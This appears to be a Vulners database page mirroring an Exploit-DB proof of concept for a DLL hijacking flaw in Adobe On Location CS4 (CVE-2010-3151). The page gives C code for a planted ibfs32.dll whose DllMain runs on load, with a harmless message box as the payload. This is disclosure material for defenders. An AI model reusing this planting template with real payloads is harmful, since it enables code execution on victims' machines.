Lucene search
+L

Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking

🗓️ 25 Aug 2010 00:00:00Reported by Glafkos CharalambousType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

Adobe On Location CS4 DLL hijacking exploit (ibfs32.dll

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2010-3151
27 Aug 201018:10
cve
cvelist
Cvelist
CVE-2010-3151
27 Aug 201018:10
cvelist
euvd
EUVD
EUVD-2010-3151
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-3151
27 Aug 201019:00
nvd
openvas
OpenVAS
Adobe On Location Insecure Library Loading Vulnerability - Windows
10 Sep 201000:00
openvas
openvas
OpenVAS
Adobe On Location Insecure Library Loading Vulnerability (Windows)
10 Sep 201000:00
openvas
prion
Prion
Design/Logic Flaw
27 Aug 201019:00
prion
/*
Exploit Title: Adobe On Location CS4 DLL Hijacking Exploit (ibfs32.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: CS4 Build 315
Tested on: Windows 7 x64 Ultimate
Vulnerable extensions: .olproj
Greetz: Astalavista, OffSEC, Exploit-DB
*/


#include <windows.h>

BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
	{
	case DLL_PROCESS_ATTACH:
		dll_hijack();
	case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
	break;
	}
	return TRUE;
}

int dll_hijack()
{
  MessageBox(0, "Adobe DLL Hijacking!", "DLL Message", MB_OK);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Aug 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 29.3
EPSS0.15077
26